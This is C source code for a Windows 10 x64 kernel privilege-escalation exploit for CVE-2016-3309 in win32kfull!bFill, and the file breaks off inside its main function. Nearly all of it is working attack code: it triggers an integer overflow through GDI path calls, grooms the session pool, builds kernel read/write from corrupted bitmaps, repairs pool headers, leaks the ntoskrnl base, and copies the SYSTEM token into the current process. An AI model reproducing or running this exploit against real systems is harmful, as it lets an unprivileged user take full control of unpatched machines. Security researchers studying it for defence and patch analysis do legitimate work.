#include <Windows.h>
#include <stdio.h>

/*
0: kd> dt ntdll!_EPROCESS uniqueprocessid token activeprocesslinks.
dtx is unsupported for this scenario.  It only recognizes dtx [<type>] [<address>] with -a, -h, and -r.  Reverting to dt.
+0x2e0 UniqueProcessId     : Ptr64 Void
+0x2e8 ActiveProcessLinks  :
+0x000 Flink               : Ptr64 _LIST_ENTRY
+0x008 Blink               : Ptr64 _LIST_ENTRY
+0x358 Token               : _EX_FAST_REF
*/
/*
Build-specific offsets consumed through the global gConfig.
The first three are field offsets inside _EPROCESS (see the debugger output above);
the last one is an offset relative to the ntoskrnl image base.
*/
typedef struct
{
	DWORD UniqueProcessIdOffset;     // _EPROCESS.UniqueProcessId
	DWORD ActiveProcessLinksOffset;  // _EPROCESS.ActiveProcessLinks
	DWORD TokenOffset;               // _EPROCESS.Token

	/*
	unfortunately, the nt!EmpCheckErrataList is not exported.
	but you can get the offset like this:
	0: kd> ? nt!EmpCheckErrataList - nt
	Evaluate expression: 1284192 = 00000000`00139860
	*/
	DWORD nt_EmpCheckErrataList_offset;  // nt!EmpCheckErrataList minus the nt image base
} VersionSpecificConfig;

// Initializer order follows the struct: UniqueProcessId, ActiveProcessLinks, Token, nt!EmpCheckErrataList offset.
VersionSpecificConfig gConfig = { 0x2e0, 0x2e8, 0x358, 0x139860, }; // win10 x64, build 15063.540

// The three handles below are (re)assigned by main() on every iteration of its final
// SetBitmapBits loop and are read by continuation_thread / readOOB_bitmap / writeOOB_bitmap.
HBITMAP pwnd_bitmap;
HBITMAP manager_bitmap = 0;
HBITMAP worker_bitmap = 0;
// Byte counts passed to SetBitmapBits; the second is derived from the first (+0x18).
// NOTE(review): a non-constant file-scope initializer (and `bool` without <stdbool.h>)
// means this file only builds as C++, not as C.
int bitmap_overwrite_count_until_sizlBitmap = 0xdd0;
int bitmap_overwrite_count_until_pvScan0 = bitmap_overwrite_count_until_sizlBitmap + 0x18;
// Set to true by main() right before its SetBitmapBits loop; polled by continuation_thread.
// NOTE(review): plain bool shared between two threads without any synchronization.
bool go = false;
// 0x1000-byte scratch buffer allocated in continuation_thread; NULL until then.
BYTE* manager_bits;

// One group of four bitmaps created back-to-back in main(); targets_objects is an array of these.
typedef struct target_objs_ {
	HBITMAP dummy_bitmap;    // created with createBitmapOfSize(bitmap_size)
	HBITMAP pwnd_bitmap;     // created with createBitmapOfSize(0xfe0)
	HBITMAP manager_bitmap;  // created with createBitmapOfSize(0xfe0)
	HBITMAP worker_bitmap;   // created with createBitmapOfSize(0xfe0)
}target_objs;

// Number of target_objs groups allocated in main().
int create_objs_count = 0x800;
// Array of create_objs_count entries, calloc'ed in main() and walked again in the cleanup loop.
target_objs* targets_objects;

// make these global as well for accessibility in cleanup
HDC hdc;         // GetDC(NULL) result from main()
HDC hMemDC;      // CreateCompatibleDC(hdc) result from main()
HGDIOBJ bitmap;  // CreateBitmap(0x666, 0x1338, 1, 32, NULL) result from main()
HGDIOBJ bitobj;  // value returned by SelectObject(hMemDC, bitmap) in main()

// Signature used for the "NtUserConvertMemHandle" export that AllocateOnSessionPool resolves at runtime.
typedef HANDLE(WINAPI* ZwUserConvertMemHandle)(BYTE* buf, DWORD size);
// Cached entry point; stays 0 until the first successful lookup in AllocateOnSessionPool.
ZwUserConvertMemHandle pfnUserConvertMemHandle = 0;
/*
Passes a 0x41-filled buffer of (size - 0x14) bytes to NtUserConvertMemHandle.

The entry point is looked up once (win32u.dll first, then user32.dll) and cached in
pfnUserConvertMemHandle.

size:    requested size; values below 0x14 are rejected.
returns: the HGLOBAL that backs the user-mode buffer (not the handle returned by
         NtUserConvertMemHandle), or INVALID_HANDLE_VALUE on failure.
         The HGLOBAL is not freed here; the caller owns it.
*/
HANDLE AllocateOnSessionPool(unsigned int size) {
	if (!pfnUserConvertMemHandle) {
		pfnUserConvertMemHandle = (ZwUserConvertMemHandle)GetProcAddress(LoadLibrary("win32u.dll"), "NtUserConvertMemHandle");
		if (!pfnUserConvertMemHandle) {
			// on win8.1 this function is located in user32.dll
			pfnUserConvertMemHandle = (ZwUserConvertMemHandle)GetProcAddress(LoadLibrary("user32.dll"), "NtUserConvertMemHandle");
			if (!pfnUserConvertMemHandle) {
				printf("could not find win32u!NtUserConvertMemHandle. exiting.\n");
				return INVALID_HANDLE_VALUE;
			}
		}
		//printf("pfnUserConvertMemHandle @ 0x%llx\n", (UINT64)pfnUserConvertMemHandle);
	}

	// size - 0x14 would wrap around for smaller values
	if (size < 0x14) {
		printf("bad size! must be at least 0x14!\n");
		return INVALID_HANDLE_VALUE;
	}

	/*
	alloc_size will be passed to HMAllocObject, i.e. pool buffer will be preceded by 0x10 bytes header
	the -0x14 comes from win32kfull!ConvertMemHandle  (lea r9d, [rdi+14h])
	*/
	DWORD alloc_size = size - 0x14;

	HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, size);
	if (!hMem) {
		printf("GlobalAlloc failed (Error 0x%x)\n", GetLastError());
		return INVALID_HANDLE_VALUE;
	}

	BYTE* buf = (BYTE*)GlobalLock(hMem);
	if (!buf) {
		printf("GlobalLock failed (Error 0x%x)\n", GetLastError());
		GlobalFree(hMem);
		return INVALID_HANDLE_VALUE;
	}

	// fill the locked block directly; no intermediate heap buffer is needed
	memset(buf, 0x41, alloc_size);

	// the handle returned by the call is intentionally not kept
	pfnUserConvertMemHandle(buf, alloc_size);

	GlobalUnlock(hMem);
	return hMem;
}

/*
Intended counterpart of AllocateOnSessionPool: hands hMem to the clipboard and then
empties the clipboard. Not called anywhere in this file.

hMem: handle previously returned by AllocateOnSessionPool.
*/
void FreeFromSessionPool(HANDLE hMem) {
	/*
	for some reason, this doesn't work. TODO!
	NOTE(review): neither return value is checked and the clipboard is never opened
	here; the Win32 clipboard documentation requires OpenClipboard before
	SetClipboardData / EmptyClipboard - probably the reason, to be confirmed.
	*/
	SetClipboardData(CF_TEXT, hMem);
	EmptyClipboard();
}

/*
Creates a 1-pixel-wide, 32bpp bitmap whose height is chosen from the requested size.

size:    allocation size EXCLUDING the 0x10 header (e.g. pass 0x3f0 to get 0x400 on pool).
         Must be >= 0x390 and a multiple of 0x10.
returns: the CreateBitmap result, or 0 when size is rejected.

Mapping observed by the original author (height -> allocation):
	0x44 => alloc 0x380 (== 0x390 on pool)
	0x48 => alloc 0x390 (== 0x3a0 on pool)
	0x4c => alloc 0x3a0 (== 0x3b0 on pool)
i.e. every additional 0x10 bytes costs 4 more rows on top of the 0x44 / 0x380 baseline.
*/
HBITMAP createBitmapOfSize(int size) {
	const int baseline_alloc = 0x380;
	const int baseline_rows = 0x44;
	HBITMAP created = 0;

	if (size < 0x390) {
		printf("bad size! can't allocate bitmap of size < 0x390!\n");
	}
	else if ((size % 0x10) != 0) {
		printf("bad size! must be a multiple of 0x10!\n");
	}
	else {
		int steps = (size - baseline_alloc) / 0x10;
		int rows = baseline_rows + steps * 4;
		created = CreateBitmap(1, rows, 1, 32, 0);
	}

	return created;
}

/*
Creates a screen-compatible bitmap, 1 pixel wide, whose height is derived from size.

size:    allocation size as listed in the "alloc" column of the table below
         (the table gives the on-pool size as that value + 0x10).
         Must be >= 0x280 and a multiple of 0x10.
returns: the CreateCompatibleBitmap result, or 0 when size is rejected.

The screen DC obtained for the call is released again before returning.
*/
HBITMAP createCompatibleBitmapOfSize(int size) {
	/*
	00 fffff9c5`398ae07c : 00000000`00000000 00000000`00000000 00000000`00000100 00000000`80000004 : win32kbase!AllocateObject
	01 fffff9c5`398aeb3f : 00000000`00000000 00000000`00000000 00000000`00000100 00000000`80000004 : win32kbase!SURFACE::Allocate+0x20
	02 fffff9c5`38cca18a : 00000000`00000004 00000000`00000670 00000000`00000000 00000000`00000000 : win32kbase!SURFMEM::bCreateDIB+0x2bf
	03 fffff9c5`38c865ed : fffff98a`c0013200 fffff98a`c0013200 00000000`00000001 00000000`00000100 : win32kfull!hsurfCreateCompatibleSurface+0x3fa
	04 fffff9c5`38cf2b5f : ffffac86`005b0480 fffff9c5`00000000 00000000`00000001 00000000`00000006 : win32kfull!GreCreateCompatibleBitmapInternal+0x255
	05 fffff803`bdc0e413 : ffffac86`005b0480 ffffd781`fe509b80 00000000`00000000 00000000`00000000 : win32kfull!NtGdiCreateCompatibleBitmap+0x1f


	CreateCompatibleBitmap(hdc, 1, x);
	- with x == 0x8 => alloc 0x290 (== 0x2a0 on pool)

	0x4 -> 0x280
	0x8 -> 0x290
	...
	0x100 -> 0x670
	*/

	if (size < 0x280) {
		printf("bad size! can't allocate compatible bitmap of size < 0x280!\n");
		return 0;
	}
	if (size % 0x10) {
		printf("bad size! must be a multiple of 0x10!\n");
		return 0;
	}

	// height x such that 0x270 + 4 * x == size (matches every row of the table above)
	int cnt = (size - 0x270) / 4;

	HDC screen_dc = GetDC(NULL);
	HBITMAP result = CreateCompatibleBitmap(screen_dc, 1, cnt);

	// every GetDC must be paired with ReleaseDC, otherwise one DC leaks per call
	if (screen_dc)
		ReleaseDC(NULL, screen_dc);

	return result;
}

/*
Writes `size` bytes from `data` to `target_address` using the manager/worker bitmap pair.

Requires the globals manager_bitmap, worker_bitmap and manager_bits to be set.

target_address: destination address stored into the pvScan0 slot of manager_bits.
data:           source bytes.
size:           number of bytes; also stored into the sizlBitmap slot of manager_bits.
returns:        result of SetBitmapBits on worker_bitmap, or 0 if the globals are not ready.
*/
int writeOOB_bitmap(UINT64 target_address, BYTE* data, int size) {
	if (manager_bitmap == NULL || worker_bitmap == NULL) {
		printf("[-] bitmaps not initialized yet!\n");
		return 0;
	}

	// need to read with GetBitmapBits at least once before we can start
	if (manager_bits == NULL) {
		printf("[-] manager_bits not initialized yet!\n");
		return 0;
	}

	const int overflow_len = bitmap_overwrite_count_until_pvScan0;
	BYTE* const dw2_slot = manager_bits + overflow_len - 0x1c;     // dw2 in sizlBitmap
	BYTE* const pvscan0_slot = manager_bits + overflow_len - 0x8;  // pvScan0

	memcpy(dw2_slot, &size, sizeof(DWORD));
	memcpy(pvscan0_slot, &target_address, sizeof(UINT64));

	// the payload is additionally placed at the start of the staging buffer
	memcpy(manager_bits, data, size);

	// push the staged bytes through manager_bitmap so they reach worker_bitmap's fields
	SetBitmapBits(manager_bitmap, overflow_len, manager_bits);

	// worker_bitmap now performs the actual write
	LONG written = SetBitmapBits(worker_bitmap, size, data);
	return written;
}

/*
Reads `size` bytes from `target_address` into `data` using the manager/worker bitmap pair.

Requires the globals manager_bitmap, worker_bitmap and manager_bits to be set.

target_address: source address stored into the pvScan0 slot of manager_bits.
data:           destination buffer, at least `size` bytes.
size:           number of bytes; also stored into the sizlBitmap slot of manager_bits.
returns:        result of GetBitmapBits on worker_bitmap, or 0 if the globals are not ready.
*/
int readOOB_bitmap(UINT64 target_address, BYTE* data, int size) {
	if (manager_bitmap == NULL || worker_bitmap == NULL) {
		printf("[-] bitmaps not initialized yet!\n");
		return 0;
	}

	// need to read with GetBitmapBits at least once before we can start
	if (manager_bits == NULL) {
		printf("[-] manager_bits not initialized yet!\n");
		return 0;
	}

	const int overflow_len = bitmap_overwrite_count_until_pvScan0;
	BYTE* const dw2_slot = manager_bits + overflow_len - 0x1c;     // dw2 in sizlBitmap
	BYTE* const pvscan0_slot = manager_bits + overflow_len - 0x8;  // pvScan0

	memcpy(dw2_slot, &size, sizeof(DWORD));
	memcpy(pvscan0_slot, &target_address, sizeof(UINT64));

	// push the staged bytes through manager_bitmap so they reach worker_bitmap's fields
	SetBitmapBits(manager_bitmap, overflow_len, manager_bits);

	// worker_bitmap now performs the actual read
	LONG fetched = GetBitmapBits(worker_bitmap, size, data);
	return fetched;
}

/*
Second-stage routine; main() starts it on its own thread before triggering the overflow.

Steps, in the order implemented below:
  1. poll the global `go` flag, then wait one more second;
  2. GetBitmapBits(manager_bitmap, 0x1000): getting all 0x1000 bytes back is taken as
     proof that the out-of-bounds access works;
  3. derive the pwnd/manager/worker bitmap addresses from the worker's pvScan0 value
     found in the bytes just read;
  4. rewrite the handle, pool header and ref-count fields of the affected bitmaps;
  5. compute the ntoskrnl base from the nt!EmpCheckErrataList pointer, read
     PsInitialSystemProcess and walk ActiveProcessLinks to the current process;
  6. copy the Token value of the system EPROCESS into the current EPROCESS;
  7. delete the GDI objects.

Takes no arguments, returns nothing, and communicates only through the file's globals.
Every failure path prints a message and returns early WITHOUT running the cleanup in step 7.

NOTE(review): declared as void(void) but handed to CreateThread through a cast to
LPTHREAD_START_ROUTINE (DWORD WINAPI (LPVOID)) - the signatures do not match.
NOTE(review): `go`, pwnd_bitmap, manager_bitmap and worker_bitmap are written by the main
thread and read here without synchronization.
*/
void continuation_thread() {

	printf("[+] continuation thread waiting for signal...\n");
	while (!go)
		Sleep(100);

	// now we're in the overflow loop in the main thread. wait a bit to make sure we've hit the overflow
	Sleep(1000);

	printf("[+] now check overflow success in continuation thread\n");

	// single GetBitmapBits read attempt: a full 0x1000-byte read means we have OOB RW capabilities
	int oob_read_count = 0x1000;
	// NOTE(review): malloc result is not checked; the buffer is kept for the process lifetime
	manager_bits = (BYTE*)malloc(oob_read_count);
	int cRead = GetBitmapBits(manager_bitmap, oob_read_count, manager_bits);
	if (cRead != oob_read_count) {
		printf("[-] could not detect arbitrary RW. expected to read 0x%x but only got 0x%x\n", oob_read_count, cRead);
		return;
	}

	printf("[+] successfully detected OOB RW capability in continuation thread!\n");
	
	/////// as soon as we have arbitrary RW we repair several structure members 
	// user-mode pointer INTO manager_bits (the local copy), not a kernel address;
	// +0x50 from here is the same slot read/writeOOB_bitmap patch as pvScan0 (count - 0x8)
	UINT64 worker_bitmap_obj = (UINT64)manager_bits + bitmap_overwrite_count_until_pvScan0 - 0x58;
	//printf("[+] worker bitmap object is @ 0x%llx\n", worker_bitmap_obj);
	
	/////// then we repair the overwritten handle of the pwnd_bitmap!

	// original_pvscan0 points to manager_bitmap + 0x270 (or pool page + 0x280)
	UINT64 worker_bitmap_pvscan0 = *(UINT64*)(worker_bitmap_obj + 0x50);
	printf("[+] worker_bitmap_pvscan0: 0x%llx\n", worker_bitmap_pvscan0);
	DWORD offset_pvScan0_to_start_BitmapObject = 0x270;
	// the three bitmaps are assumed to sit 0x1000 bytes apart, in the order pwnd, manager, worker
	UINT64 pwnd_bitmap_address = worker_bitmap_pvscan0 - offset_pvScan0_to_start_BitmapObject - 0x2000;
	UINT64 manager_bitmap_address = worker_bitmap_pvscan0 - offset_pvScan0_to_start_BitmapObject - 0x1000;
	UINT64 worker_bitmap_address = worker_bitmap_pvscan0 - offset_pvScan0_to_start_BitmapObject;
	printf("[+] pwnd bitmap located @ 0x%llx\n", pwnd_bitmap_address);
	printf("[+] manager bitmap located @ 0x%llx\n", manager_bitmap_address);
	printf("[+] worker bitmap located @ 0x%llx\n", worker_bitmap_address);

	printf("[+] repairing BASEOBJ64.hHmgr value of pwnd_bitmap (0x%llx) at address 0x%llx\n", (UINT64)pwnd_bitmap, pwnd_bitmap_address);

	// the handle value itself is written to offset 0 of the pwnd bitmap object
	int cWritten = writeOOB_bitmap(pwnd_bitmap_address, (BYTE*)&pwnd_bitmap, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] repair of pwnd_bitmap handle failed!\n");
		return;
	}

	printf("[+] repairing pool header of pwnd_bitmap\n");
	/*
	fix pool header, this is static for a given size.
	0: kd> db ffffe428`9c5f8000+2000
	ffffe428`9c5fa000  00 00 ff 23 47 68 30 35-00 00 00 00 00 00 00 00  ...#Gh05........
	ffffe428`9c5fa010  50 08 05 0c 00 00 00 00-00 00 00 00 00 00 00 00  P...............
	ffffe428`9c5fa020  80 c0 3b d7 81 a9 ff ff-00 00 00 00 00 00 00 00  ..;.............
	*/
	// sizeof(...) - 1 everywhere below: the string literal's terminating NUL is not part of the 16-byte header
	BYTE pool_header_bitmap[] = "\x00\x00\xff\x23\x47\x68\x30\x35\x00\x00\x00\x00\x00\x00\x00\x00";
	cWritten = writeOOB_bitmap(pwnd_bitmap_address - 0x10, (BYTE*)&pool_header_bitmap, sizeof(pool_header_bitmap) - 1);
	if (cWritten != sizeof(pool_header_bitmap) - 1) {
		printf("[-] repair of pool_header_bitmap failed!\n");
		return;
	}
	
	printf("[+] repairing ref counts of pwnd bitmap and manager bitmap\n");
	// both objects get 8 zero bytes at offset +0x8
	UINT64 null_ptr = 0;
	cWritten = writeOOB_bitmap(pwnd_bitmap_address + 0x8, (BYTE*)&null_ptr, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] repair of ref count for pwnd_bitmap failed!\n");
		return;
	}
	cWritten = writeOOB_bitmap(manager_bitmap_address + 0x8, (BYTE*)&null_ptr, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] repair of ref count for manager_bitmap failed!\n");
		return;
	}

	printf("[+] repairing pool header after pwnd_bitmap buffer\n");
	BYTE next_pool_header[] = "\xff\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
	cWritten = writeOOB_bitmap(manager_bitmap_address - 0x20, (BYTE*)&next_pool_header, sizeof(next_pool_header) - 1);
	if (cWritten != sizeof(next_pool_header) - 1) {
		printf("[-] repair of next_pool_header failed!\n");
		return;
	}

	printf("[+] now getting ntoskrnl base\n");
	
	UINT64 nt_EmpCheckErrataList = 0;
	UINT64 tid_ptr = *(UINT64*)(worker_bitmap_obj + 0x10); // the BASEOBJECT64 structure seems to have changed. obviously, this is not a tid ;)
	printf("[+] reading nt!EmpCheckErrataList from @ 0x%llx\n", tid_ptr + 0x2a8);
	cRead = readOOB_bitmap(tid_ptr + 0x2a8, (BYTE*)&nt_EmpCheckErrataList, sizeof(UINT64));
	if (cRead != sizeof(UINT64) || !nt_EmpCheckErrataList) {
		printf("[-] couldn't read nt!EmpCheckErrataList pointer!\n");
		return;
	}

	printf("[+] nt!EmpCheckErrataList @ 0x%llx\n", nt_EmpCheckErrataList);

	UINT64 ntoskrnl_base_address = nt_EmpCheckErrataList - gConfig.nt_EmpCheckErrataList_offset;
	printf("[+] ntoskrnl base address: 0x%llx\n", ntoskrnl_base_address);

	// the image is loaded into this process only to compute the export's offset from its base
	// NOTE(review): neither the LoadLibrary nor the GetProcAddress result is checked
	UINT64 ntoskrnl = (UINT64)LoadLibrary("ntoskrnl.exe");
	// get address of exported PsInitialSystemProcess variable
	UINT64 pPsInitialSystemProcess = (UINT64)GetProcAddress((HMODULE)ntoskrnl, "PsInitialSystemProcess");
	UINT64 delta_PsInitialSystemProcess = pPsInitialSystemProcess - ntoskrnl;
	FreeLibrary((HMODULE)ntoskrnl);

	printf("[+] reading system EPROCESS from 0x%llx\n", ntoskrnl_base_address + delta_PsInitialSystemProcess);
	UINT64 system_eprocess = 0;
	// subtract addr from ntos to get PsInitialSystemProcess offset from base
	cRead = readOOB_bitmap(ntoskrnl_base_address + delta_PsInitialSystemProcess, (BYTE *)&system_eprocess, sizeof(UINT64));
	if (cRead != sizeof(UINT64) || !system_eprocess) {
		printf("[-] couldn't read SYSTEM eprocess!\n");
		return;
	}

	printf("[+] system eprocess @ 0x%llx\n", system_eprocess);

	// walk ActiveProcessLinks until we find our Pid
	LIST_ENTRY ActiveProcessLinks;
	cRead = readOOB_bitmap(system_eprocess + gConfig.ActiveProcessLinksOffset, (BYTE*)&ActiveProcessLinks, sizeof(LIST_ENTRY));
	if (cRead != sizeof(LIST_ENTRY) || !ActiveProcessLinks.Flink) {
		printf("[-] couldn't read ActiveProcessLinks!\n");
		return;
	}

	printf("[+] now walking ActiveProcessLinks to find EPROCESS of current process...\n");
	UINT64 pEPROCESS = 0;
	UINT64 current_proc_eprocess = 0;
	UINT64 UniqueProcessId = 0;
	while (1) {
		// Flink points at the ActiveProcessLinks field of the next entry; step back to the structure start
		pEPROCESS = (UINT64)ActiveProcessLinks.Flink - gConfig.ActiveProcessLinksOffset;

		// get pid of current EPROCESS
		cRead = readOOB_bitmap(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE*)&UniqueProcessId, sizeof(UINT64));
		if (cRead != sizeof(UINT64) || !UniqueProcessId) {
			printf("[-] could not read ActiveProcessLinks!\n");
			break;
		}
		//printf("[+] pEPROCESS 0x%llx, PID 0x%llx (0x%x)\n", pEPROCESS, UniqueProcessId, GetCurrentProcessId());

		// is this our pid? break loop if this is the case
		if (GetCurrentProcessId() == UniqueProcessId) {
			current_proc_eprocess = pEPROCESS;
			break;
		}

		// get next entry
		cRead = readOOB_bitmap(pEPROCESS + gConfig.ActiveProcessLinksOffset, (BYTE*)&ActiveProcessLinks, sizeof(LIST_ENTRY));
		if (cRead != sizeof(LIST_ENTRY) || !ActiveProcessLinks.Flink) {
			printf("[-] could not read ActiveProcessLinks!\n");
			break;
		}

		// if next same as last, we reached the end
		if (pEPROCESS == (UINT64)ActiveProcessLinks.Flink - gConfig.ActiveProcessLinksOffset)
			break;
	}

	// all `break`s above except the pid match leave this at 0
	if (!current_proc_eprocess) {
		printf("[-] walking EPROCESS structures failed: could not spot current process EPROCESS!\n");
		return;
	}

	printf("[+] found EPROCESS of current process @ 0x%llx\n", current_proc_eprocess);
	printf("[+] getting SYSTEM token\n");
	UINT64 SystemToken = 0;
	cRead = readOOB_bitmap(system_eprocess + gConfig.TokenOffset, (BYTE*)&SystemToken, sizeof(UINT64));
	if (cRead != sizeof(UINT64) || !SystemToken) {
		printf("[-] could not read SYSTEM token\n");
		return;
	}

	printf("[+] writing SYSTEM token to current EPROCESS\n");
	cWritten = writeOOB_bitmap(current_proc_eprocess + gConfig.TokenOffset, (BYTE*)&SystemToken, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] writing SYSTEM token failed!\n");
		return;
	}

	printf("[+] cleanup...\n");
	for (int i = 0; i < create_objs_count; i++) {
		DeleteObject(targets_objects[i].dummy_bitmap);
		// we only skip the pwnd bitmap since it is locked by the SetBitmapBits syscall in main thread :)
		// (the group in use is recognised by its manager_bitmap handle)
		if (targets_objects[i].manager_bitmap != manager_bitmap)
			DeleteObject(targets_objects[i].pwnd_bitmap);
		DeleteObject(targets_objects[i].manager_bitmap);
		DeleteObject(targets_objects[i].worker_bitmap);
	}
	DeleteObject(bitobj);
	DeleteObject(bitmap);
	DeleteDC(hMemDC);
	ReleaseDC(NULL, hdc);

	printf("[+] done.\n");
	return;
}

/*
Program entry point (argc/argv are unused).

Order of operations:
  1. create the screen DC, a memory DC and a 0x666 x 0x1338 32bpp bitmap selected into it;
  2. map 0x100 bytes at the fixed address 0x100000000 and fill them with 0x01;
  3. prepare bitmap_bits, the buffer later written with SetBitmapBits;
  4. start continuation_thread;
  5. BeginPath / sizeA x PolylineTo(sizeB points) / EndPath;
  6. perform the session-pool and bitmap allocations;
  7. FillPath;
  8. set `go` and call SetBitmapBits on every pwnd_bitmap, last group first;
  9. Sleep(-1) - the function never returns on this path.

NOTE(review): `void main` is non-standard; several error paths `return` after the DC,
the bitmap and the helper thread were already created, without releasing them.
*/
void main(int argc, char* argv[]) {
	printf("[+] win32kfull!bFill (aka. CVE-2016-3309) reloaded, @bitshifter123, siberas, 10/2017\n");
	printf("[+] target: Windows 10 x64 RS2 (build 15063.540)\n");
	printf("[+] exploitation primitive: BITMAPS\n");

	// NOTE(review): none of these four results is checked
	hdc = GetDC(NULL);
	hMemDC = CreateCompatibleDC(hdc);
	bitmap = CreateBitmap(0x666, 0x1338, 1, 32, NULL);
	bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);

	// the mapping must land exactly at fakeaddr, otherwise we bail out
	UINT64 fakeaddr = 0x100000000;
	UINT64 fakeptr = (UINT64)VirtualAlloc((LPVOID)fakeaddr, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (!fakeptr || fakeptr != fakeaddr) {
		printf("[-] VirtualAlloc Failed! ret: 0x%llx (Error 0x%x)\n", fakeptr, GetLastError());
		return;
	}
	memset((PVOID)fakeptr, 0x1, 0x100);

	bool success = false; // NOTE(review): never used
	// NOTE(review): malloc result is not checked
	BYTE *bitmap_bits = (BYTE*)malloc(bitmap_overwrite_count_until_sizlBitmap * 4);
	memset(bitmap_bits, 0x04, bitmap_overwrite_count_until_sizlBitmap * 4);

	// only the low 4 bytes of sizeX / sizeY are copied (the variables are 64-bit)
	UINT64 sizeX = 0x1;
	UINT64 sizeY = 0x1338;
	memcpy(&bitmap_bits[bitmap_overwrite_count_until_sizlBitmap - 4], &sizeX, 0x4);
	memcpy(&bitmap_bits[bitmap_overwrite_count_until_sizlBitmap - 8], &sizeY, 0x4);
	UINT64 null_ptr = 0;
	memcpy(&bitmap_bits[bitmap_overwrite_count_until_sizlBitmap - 0x10], &null_ptr, sizeof(UINT64));

	// kick off second thread which will keep us alive as soon as we hit the 
	// loop which checks for the successful overwrite
	// NOTE(review): the returned thread handle is discarded and failure is not detected
	DWORD tid;
	CreateThread(0, 0, (LPTHREAD_START_ROUTINE)continuation_thread, 0, 0, &tid);

	/*
	// offset +0
	0x30: 0x10000 * 0x10000 = 0x10000000 => 0x10000001 * 0x30 = (int32)0x30
	0x60: 0x11 * 0xf0f0f1 = 0x10000001 => 0x10000002 * 0x30 = (int32)0x60
	0x90: 0xc06*0x154ab = 0x10000002 => 0x10000003 * 0x30 = (int32)0x90

	// offset +10
	0x10: 0xccd*0xd552	= 0xaaaaaaa => 0xaaaaaab *0x30 = 0x200000010 = (int32)0x10 => alloc of 0x20
	0x40: 0x3b*0x2e4851	= 0xaaaaaab => 0xaaaaaac *0x30 = 0x200000040 = (int32)0x40 => alloc of 0x50
	0x70: 0x804*0x154ab	= 0xaaaaaac => 0xaaaaaad *0x30 = 0x200000070 = (int32)0x70 => alloc of 0x80
	0xa0: 0x1769*0x74a5	= 0xaaaaaad => 0xaaaaaae *0x30 = 0x2000000a0 = (int32)0xa0 => alloc of 0xb0

	// offset +20
	0x20: 0x27b*0x2266f = 0x5555555 => 0x5555556 * 0x30 = (int32)0x20 => alloc of 0x30 bytes
	0x50: 0x156*0x3FE01 = 0x5555556 => 0x5555557 * 0x30 = (int32)0x50 => alloc of 0x60 bytes
	0x80: 0xa1*0x87af7	= 0x5555557 => 0x5555558 * 0x30 = (int32)0x80 => alloc of 0x90 bytes
	0xb0: 0xfd3*0x5648	= 0x5555558 => 0x5555559 * 0x30 = (int32)0xb0 => alloc of 0xc0 bytes
	0xe0: 0x13369*0x471	= 0x5555559 => 0x555555a * 0x30 = (int32)0xe0 => alloc of 0xf0 bytes
	*/
	// this pair is the "0xa0" row of the table above
	int sizeA = 0x1769;
	int sizeB = 0x74a5;
	// both sizes are WITHOUT header, i.e. if they should add up to 0x1000
	// we need for example chunksize 0xf40 and bitmap_size 0xa0. 0xf40 + 0x10 + 0xa0 + 0x10 == 0x1000
	// NOTE(review): the chunksize expression is evaluated in signed int and depends on
	// wraparound, which is undefined behaviour; unsigned arithmetic would be well defined
	DWORD chunksize = (DWORD)(((sizeA * sizeB) + 1) * 0x30);
	UINT64 real_size = (((UINT64)sizeA * (UINT64)sizeB) + 1) * 0x30;
	int bitmap_size = 0x1000 - 0x10 - chunksize - 0x10;
	//printf("[+] sizeA 0x%x\n", sizeA);
	//printf("[+] sizeB 0x%x\n", sizeB);
	printf("[+] prepare int overflow: ((0x%x * 0x%x) + 1) * 0x30 == 0x%llx == (int32) 0x%x\n", sizeA, sizeB, real_size, chunksize);
	//printf("[+] chunksize == 0x%x => bitmap_size == 0x%x\n", chunksize, bitmap_size);
	printf("[+] header + chunksize + header + bitmap_size = 0x%x + 0x10 + 0x%x + 0x10 = 0x%x\n", chunksize, bitmap_size, chunksize + 0x10 + bitmap_size + 0x10);

	// sanity check: both pieces plus their two 0x10 headers must fill exactly one 0x1000 page
	if (chunksize > 0x1000 ||
		bitmap_size > 0x1000 ||
		bitmap_size + chunksize + 0x20 != 0x1000) {
		printf("[-] bad sizes!? exiting!\n");
		return;
	}

	// NOTE(review): malloc result is not checked and the array is never freed
	POINT* points = (POINT*)malloc(sizeB * sizeof(POINT));
	DWORD point_value = 0x66000000;
	for (int x = 0; x < sizeB; x++) {
		points[x].x = point_value;
		points[x].y = point_value;
	}

	printf("[BUG 1/4] BeginPath\n");
	if (!BeginPath(hMemDC)) {
		printf("[-] BeginPath() Failed: %x\n", GetLastError());
		return;
	}

	printf("[BUG 2/4] PolylineTo\n");
	for (int j = 0; j < sizeA; j++) {
		// only the first call uses distinct values for points[1] and points[2];
		// every later call restores them to point_value
		if (j == 0)
		{
			points[1].x = 0x11223344;
			points[1].y = 0x360;
			points[2].x = 1;
			points[2].y = 0x400;
		}
		else
		{
			points[1].x = point_value;
			points[1].y = point_value;
			points[2].x = point_value;
			points[2].y = point_value;
		}

		if (!PolylineTo(hMemDC, points, sizeB)) {
			printf("[-] PolylineTo() Failed: %x\n", GetLastError());
			return;
		}
	}

	printf("[BUG 3/4] EndPath\n");
	EndPath(hMemDC);

	printf("[+] now perform pool feng shui...\n");
	//printf("[+] defragment size 0x%x!\n", chunksize + 0x10);
	Sleep(100);
	
	// raised priority is kept until right after FillPath
	SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);

	// defragment on page level  we will cause 0xfe0 + 0x10 = 0xff0-sized buffers, filling one pool page each
	// (return values of AllocateOnSessionPool are ignored throughout)
	for (int i = 0; i < 0x400; i++) {
		AllocateOnSessionPool(0xfe0);
	}

	// defragment with chunksize - we will create buffer on pool of size chunksize + 0x10
	for (int i = 0; i < 0x5000; i++) {
		AllocateOnSessionPool(chunksize);
	}

	// NOTE(review): calloc result is not checked
	targets_objects = (target_objs*)calloc(create_objs_count, sizeof(target_objs));

	for (int i = 0; i < create_objs_count; i++) {
